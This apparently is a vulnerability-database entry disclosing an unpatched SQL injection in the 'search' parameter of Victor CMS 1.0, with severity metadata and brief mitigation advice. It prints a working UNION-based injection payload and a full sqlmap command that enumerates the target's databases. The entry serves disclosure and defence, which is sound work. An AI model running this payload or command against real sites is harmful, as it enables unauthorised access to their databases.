vendor:
Victor CMS
by:
Edo Maland
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Victor CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:victor_alagwu:victor_cms:1.0
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: XAMPP / Windows 10
2020
Victor CMS 1.0 – ‘Search’ SQL Injection
The Victor CMS v1.0 application is vulnerable to SQL injection via the 'search' parameter on the search.php page. An attacker can send a malicious payload to the vulnerable parameter to gain access to the database. The payload used in this exploit is 1337'union+select+1,2,version(),database(),5,6,7,8,9,10 -- -. The sqlmap command used to exploit this vulnerability is sqlmap -u "http://example.com/CMSsite/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.